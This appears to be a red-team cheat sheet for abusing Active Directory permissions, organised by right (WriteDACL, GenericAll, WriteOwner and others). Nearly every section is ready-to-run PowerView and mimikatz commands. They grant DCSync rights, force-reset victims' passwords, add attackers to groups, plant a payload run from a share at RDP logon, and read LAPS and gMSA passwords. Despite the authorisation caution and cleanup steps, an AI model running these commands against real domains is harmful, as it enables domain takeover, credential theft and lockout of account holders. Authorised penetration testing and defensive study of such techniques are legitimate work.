Security descriptors

References

WriteDACL

Abuse
Requires WriteDacl on the domain object itself (the domain head, not a user or group). -Rights DCSync adds the DS-Replication-Get-Changes, -Get-Changes-All and -Get-Changes-In-Filtered-Set extended rights for the principal:
Add-DomainObjectAcl -TargetIdentity <fqdn_domain> -PrincipalIdentity <user> -Rights DCSync -Verbose
Cleanup
Remove-DomainObjectAcl -TargetIdentity <fqdn_domain> -PrincipalIdentity <user> -Rights DCSync -Verbose

ForceChangePassword (User-Force-Change-Password extended right; lets you reset the target's password without knowing the current one)

Abuse
mimikatz "lsadump::setntlm /server:<dc> /user:<victim_user> /ntlm:<new_ntlm_hash>" (a /password:<new_password> form is also accepted). Either way this is a reset, not a change: the previous secret is gone, the victim is locked out, and there is no clean rollback - get explicit authorisation before touching a real account.

1 - Build a credential object for the user that holds ForceChangePassword (OPTIONAL: skip this step, and drop -Credential below, when the current session already runs as that user)

$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<domain>\<user>', $SecPassword)

2 - Reset the victim's password (no cleanup possible: the old password cannot be restored)

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

AddMember (write access to the group's member attribute)

Abuse
net group takes the group's sAMAccountName; Add-DomainGroupMember also accepts -Credential $Cred (the credential built in step 1 above) when the current session does not hold the right:
net group '<group>' <user> /domain /add
Add-DomainGroupMember -Identity '<group>' -Members <user>
Cleanup
net group '<group>' <user> /domain /delete
Remove-DomainGroupMember -Identity '<group>' -Members <user>

GenericAll

Abuse
Which lines apply depends on the object the right is held over.
Over a group - add a controlled principal to it:
Add-DomainGroupMember -Identity '<group>' -Members <user>

Over a user - reset its password ($Cred is the credential object built in step 1 above; drop -Credential when already running as the attacking user). This is a reset: the victim loses access and the old password cannot be restored, so there is no cleanup for it.
$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Or point the victim's Terminal Services initial program at a payload. It only runs when the victim next logs on interactively through RDP/Terminal Services and the session honours mstsinitialprogram, so it is slow and noisy:
Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose
Cleanup
Remove-DomainGroupMember -Identity '<group>' -Members <user>

-Clear takes attribute names, not a hashtable:
Set-DomainObject <user> -Clear 'mstsinitialprogram' -Verbose

GenericWrite

Abuse
GenericWrite covers property writes (group membership, mstsinitialprogram) but does NOT include the User-Force-Change-Password extended right: the password reset below only works if that right is granted separately. Check the ACE before relying on it.

Over a group:
Add-DomainGroupMember -Identity '<group>' -Members <user>

Over a user - password reset, only with ForceChangePassword also present ($Cred is the credential built in step 1 above; this is a reset with no rollback):
$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Over a user - attribute write (fires only on the victim's next RDP/Terminal Services logon):
Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose
Cleanup
Remove-DomainGroupMember -Identity '<group>' -Members <user>

-Clear takes attribute names, not a hashtable:
Set-DomainObject <user> -Clear 'mstsinitialprogram' -Verbose

WriteOwner

Abuse
Record the current owner first (from the object's nTSecurityDescriptor) so it can be restored, then take ownership:
Set-DomainObjectOwner -Identity <victim> -OwnerIdentity <controlled_user>
Ownership by itself only gives the implicit READ_CONTROL/WRITE_DAC; the usual next step is to grant the controlled user full control and then continue as under GenericAll:
Add-DomainObjectAcl -TargetIdentity <victim> -PrincipalIdentity <controlled_user> -Rights All -Verbose
Cleanup
Remove-DomainObjectAcl -TargetIdentity <victim> -PrincipalIdentity <controlled_user> -Rights All -Verbose
Set-DomainObjectOwner -Identity <victim> -OwnerIdentity <original_owner>

AllExtendedRights

Abuse
Which lines apply depends on the object the right is held over.

Over a group:
Add-DomainGroupMember -Identity '<group>' -Members <user>

Over a user - AllExtendedRights includes User-Force-Change-Password, so the password can be reset ($Cred is the credential built in step 1 above; this is a reset with no rollback):
$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

mstsinitialprogram is an ordinary attribute write (WriteProperty), which extended rights alone do not grant - only usable when a property-write right is also present:
Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

Over the domain object - the extended rights include DS-Replication-Get-Changes*, i.e. DCSync:
Add-DomainObjectAcl -TargetIdentity <fqdn_domain> -PrincipalIdentity <user> -Rights DCSync -Verbose

Over a computer

Legacy LAPS stores the local admin password in the confidential attribute ms-Mcs-AdmPwd, which is exactly what the control-access right unlocks (Windows LAPS uses msLAPS-Password / msLAPS-EncryptedPassword instead):
Get-DomainComputer <computer_name> -Properties samaccountname,ms-mcs-admpwd
gMSA password retrieval is a separate case: it is governed by msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) rather than by extended rights on the account, and needs a sealed (Kerberos) LDAP session:
$gmsa = Get-ADServiceAccount -Identity '<gmsa_account>' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp # DSInternals module
Cleanup
Remove-DomainGroupMember -Identity '<group>' -Members <user>

-Clear takes attribute names, not a hashtable:
Set-DomainObject <user> -Clear 'mstsinitialprogram' -Verbose

Revert the DCSync ACE if one was added:
Remove-DomainObjectAcl -TargetIdentity <fqdn_domain> -PrincipalIdentity <user> -Rights DCSync -Verbose